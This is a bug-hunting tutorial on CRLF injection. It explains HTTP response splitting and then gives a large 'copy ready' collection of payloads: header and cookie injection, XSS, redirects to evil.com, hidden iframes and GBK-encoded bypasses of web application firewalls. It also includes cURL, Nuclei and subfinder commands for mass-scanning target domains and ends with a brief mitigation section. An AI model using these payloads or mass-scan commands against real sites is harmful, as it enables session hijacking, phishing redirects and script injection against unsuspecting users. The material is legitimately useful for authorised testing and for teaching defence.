CRLF Injection — HTTP Header Manipulation
Carriage Return and Line Feed injection leading to HTTP response splitting, web cache poisoning, XSS, session fixation and more
8 Phases40+ PayloadsCopy Ready
Introduction
In web security some vulnerabilities don't get as much attention but can still cause major problems. One of these is CRLF Injection. Although it's not as well-known as SQL Injection or Cross-Site Scripting, CRLF Injection can lead to serious issues like HTTP response splitting, web cache poisoning and even XSS attacks — all of which can put a website at risk.
Phase 1
What is CRLF Injection?
CRLF stands for Carriage Return (CR, %0d) and Line Feed (LF, %0a), which are special characters used to denote the end of a line in HTTP headers. CRLF Injection occurs when an attacker is able to inject these characters into HTTP headers or responses, manipulating how the server or client interprets the response.
By injecting CRLF sequences, an attacker can prematurely terminate headers and inject arbitrary headers or even body content leading to various attacks such as:
- HTTP Response Splitting
- Web Cache Poisoning
- Cross-Site Scripting (XSS)
- Session Fixation
How Does CRLF Injection Work?
CRLF Injection relies on the ability to inject a newline character (%0d%0a in URL encoding) into HTTP headers. When these characters are inserted at the wrong place in the response they can break the header structure allowing attackers to introduce custom headers or even manipulate the content of the response.
For example in a web application that doesn't properly sanitize user input, an attacker could inject the following payload into a field that is reflected in the HTTP response headers:
1Basic CRLF header injection payload
%0d%0aX-Injection-Test: injectedPhase 2
Real-World Payload Examples
Basic Header Injection
One of the simplest forms of CRLF Injection is when attackers add custom headers. This is done by injecting the %0d%0a sequence:
2Inject a custom HTTP header
%0d%0aX-Injection-Test: injectedCookie Injection
CRLF Injection can be used to inject new cookies into the HTTP response. This is particularly dangerous when session data or other sensitive information is being managed via cookies.
3Inject a malicious cookie
%0d%0aSet-Cookie: hacked=true;HTML Injection
One of the more insidious uses of CRLF Injection is to inject HTML or JavaScript into an HTTP response, which can trigger cross-site scripting (XSS) or unwanted redirects.
4HTML injection via CRLF
%0d%0a%3Ch1%3EHTML INJECTION%3C%2Fh1%3E%0A%3Cp%3ECRLF%20Injection%20PoC%3C%2Fh1%3EDecoded HTML:
<h1>HTML INJECTION</h1>
<p>CRLF Injection PoC by coffin</p>
Redirection / Phishing
CRLF Injection can be used to inject links that redirect users to phishing sites:
5Phishing link injection
%0d%0a%0d%0a%3CA%20HREF%3D%22https%3A%2F%2Fexample.com%2F%22%3ELogin%20Here%20%3C%2FA%3E%0A%0ADecoded HTML:
<A HREF="https://example.com/">Login Here </A>Injecting Dangerous HTML Elements
A common and dangerous use of CRLF Injection is to inject JavaScript code that executes in the victim's browser leading to XSS attacks.
6XSS via img onerror
%0d%0a%0d%0a%3Cimg%20src%3Dx%20onerror%3Dprompt%281%29%3EDecoded HTML:
<img src=x onerror=prompt(1)>Open Redirect
CRLF Injection can also be used to perform open redirect attacks by injecting a new Location header into the HTTP response. When successful this forces the browser to redirect the user to a malicious site.
7Open redirect via CRLF
%0d%0aLocation:%20https://evil.comXSS Injection
Another common use of CRLF Injection is to insert JavaScript into an HTTP response, leading to Cross-Site Scripting (XSS).
8XSS via CRLF injection
%0d%0a%0d%0a<script>alert('XSS via CRLF')</script>Redirecting with JavaScript Injection
9JavaScript redirect via CRLF
%0d%0a%0d%0a%3Cscript%3Edocument.location.href%3D%22https%3A%2F%2Fevil.com%22%3C%2Fscript%3EDecoded:
<script>document.location.href="https://evil.com"</script>XSS Protection Bypass
A more advanced use of CRLF Injection involves disabling browser-based XSS protections by injecting custom HTTP headers. Attackers can insert the X-XSS-Protection: 0 header, which tells the browser to ignore built-in protections against reflected XSS.
10Disable XSS protection and inject script
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.cookie%29%3C/script%3EDecoded:
?
Location:
Content-Type:text/html
X-XSS-Protection:0
<script>alert(document.cookie)</script>
IFrame Injection
The attacker could inject a hidden iframe to redirect users to a malicious site:
11Hidden iframe injection
%0d%0a%0d%0a%3Ciframe%20src%3D%22https%3A%2F%2Fwww.nasa.gov%2F%22%20style%3D%22border%3A%200%3B%20position%3Afixed%3B%20top%3A0%3B%20left%3A0%3B%20right%3A0%3B%20bottom%3A0%3B%20width%3A100%25%3B%20height%3A100%25%22%3E%0ADecoded:
<iframe src="https://www.nasa.gov/" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%">Phase 3
HTTP Response Splitting
HTTP Response Splitting is a powerful technique made possible by CRLF Injection. By injecting %0d%0a(Carriage Return + Line Feed), an attacker can split the server's HTTP response into two parts. This enables manipulation of headers and body content in unexpected ways.
HTTP Request
/vulnerable-endpoint?q=abc%0d%0aContent-Length:0%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type:text/html%0d%0a%0d%0a<script>alert('Split!')</script>%0d%0a→ Ends the current header lineContent-Length: 0→ Ends original response- A new
HTTP/1.1 200 OKresponse starts with a malicious script in the body - The browser or cache may treat the second part as a new valid response
Phase 4
Bypass Technique — GBK Encoding
When basic CRLF payloads like the following get blocked by WAF:
12Basic CRLF payload (often blocked)
/%0D%0ASet-Cookie:whoami=coffinxpYou can bypass the firewall using GBK-encoded characters that act like CR and LF. In GBK encoding:
嘍 = %E5%98%8D (CR)嘊 = %E5%98%8A (LF)
Bypass Payload
13GBK-encoded CRLF bypass payload
https://example.com/%E5%98%8D%E5%98%8ASet-Cookie:crlfinjection=coffinxpThis payload bypasses standard filtering and successfully injects a custom header like: Set-Cookie: crlfinjection=coffinxp
XSS Chaining (GBK-encoded <script>)
To escalate CRLF to XSS: < = 嘼 = %E5%98%BC, > = 嘾 = %E5%98%BE
14Full CRLF to XSS via GBK encoding
https://example.com/%E5%98%8D%E5%98%8ASet-Cookie:whoami=coffinxp%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%8D%E5%98%8A%E5%98%BCscript%E5%98%BEalert(1);%E5%98%BC/script%E5%98%BEPhase 5
How to Hunt for CRLF Injection
Using cURL
One of the easiest ways to test for CRLF Injection is by using cURL. It allows you to send custom requests and observe how the server handles special characters.
15Test CRLF injection with cURL
curl -I "https://example.com/%0d%0aSet-Cookie:crlf=injected;"Response
HTTP/2 301
date: Mon, 12 May 2025 12:46:42 GMT
content-type: text/html
location: https://example.com/
set-cookie: crlf=injected;Automate with Nuclei
You can also use my custom Nuclei template to easily detect CRLF injection vulnerabilities at scale across multiple target domains.
16Scan a single URL for CRLF
nuclei -u https://target.com -t cRlf.yaml17Mass CRLF scan across subdomains
subfinder -d domain.com -all | nuclei -t cRlf.yaml
Using Loxs Tool
You can also use our Loxs tool to perform mass scanning for CRLF injection vulnerabilities across multiple targets quickly and efficiently.
Nuclei Template vs Crlfuzz
You'll notice the difference — my Nuclei template detects more vulnerable domains compared to the Crlfuzz tool, making it more effective for large-scale CRLF injection hunting.
Using Burp Suite
Burp Suite makes it easy to detect CRLF Injection by observing how the server responds to special newline characters in request parameters.
- 1Intercept a request using Burp (e.g., a GET request with a query parameter like
?page=home). - 2Send the request to Repeater.
- 3Modify a parameter by injecting CRLF sequences like:
home%0d%0aSet-Cookie:injected=1. - 4Observe the response — look for new headers or broken layout.
Advanced Tips
Phase 6
Complete Payload List
CRLF Payloads
/%%0a0aSet-Cookie:coffin=hi
/%0aSet-Cookie:coffin=hi;
/%0aSet-Cookie:coffin=hi
/%0d%0aLocation: http://evil.com
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
/%0d%0a%0d%0a<script>alert('XSS')</script>;
/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e
/%0d%0aContent-Type: text/html%0d%0aHTTP/1.1 200 OK%0d%0aContent-Type: text/html%0d%0a%0d%0a<script>alert('XSS');</script>
/%0d%0aHost: {{Hostname}}%0d%0aCookie: coffin=hi%0d%0a%0d%0aHTTP/1.1 200 OK%0d%0aSet-Cookie: coffin=hi%0d%0a%0d%0a
/%0d%0aLocation: www.evil.com
/%0d%0aSet-Cookie:coffin=hi;
/%0aSet-Cookie:coffin=hi
/%23%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<svg/onload=alert(document.domain)>
/%23%0aSet-Cookie:coffin=hi
/%25%30%61Set-Cookie:coffin=hi
/%2e%2e%2f%0d%0aSet-Cookie:coffin=hi
/%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a<script>alert(document.cookie)</script>%2F../%2F..%2F..%2F..%2F../tr
/%3f%0d%0aLocation:%0d%0acoffin-x:coffin-x%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection:0%0d%0a%0d%0a<script>alert(document.domain)</script>
/%5Cr%20Set-Cookie:coffin=hi;
/%5Cr%5Cn%20Set-Cookie:coffin=hi;
/%5Cr%5Cn%5CtSet-Cookie:coffin%5Cr%5CtSet-Cookie:coffin=hi;
/%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:coffin=hi;
/%E5%98%8A%E5%98%8DLocation:www.evil.com
/%E5%98%8D%E5%98%8ALocation:www.evil.com
/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi
/%E5%98%8D%E5%98%8ASet-Cookie:coffin=hi;
/%E5%98%8D%E5%98%8ASet-Cookie:coffinxp=coffinxp
/%u000ASet-Cookie:coffin=hi;
/www.evil.com/%2E%2E%2F%0D%0Acoffin-x:coffin-x
/www.evil.com/%2F..%0D%0Acoffin-x:coffin-xResources
Phase 7
Mitigation & Prevention
To prevent CRLF Injection attacks, developers should:
- 1Sanitize and Validate Input: Ensure that any user input that can be reflected in HTTP headers is properly sanitized. This includes stripping out
\r(Carriage Return) and\n(Line Feed) characters. - 2Use Safe Functions for Header Manipulation: Avoid manually constructing headers. Use secure and well-tested libraries to handle HTTP header construction to prevent accidental injection.
- 3Output Encoding: Encode special characters in user input, especially when displaying data in HTTP headers to prevent the insertion of malicious content.
Conclusion
CRLF Injection is a hidden yet powerful vulnerability that can lead to serious issues like XSS, header injection and HTTP response splitting. By understanding how CR and LF characters are interpreted by servers and testing with crafted payloads, you can uncover and fix these flaws to keep your web applications secure.
Tools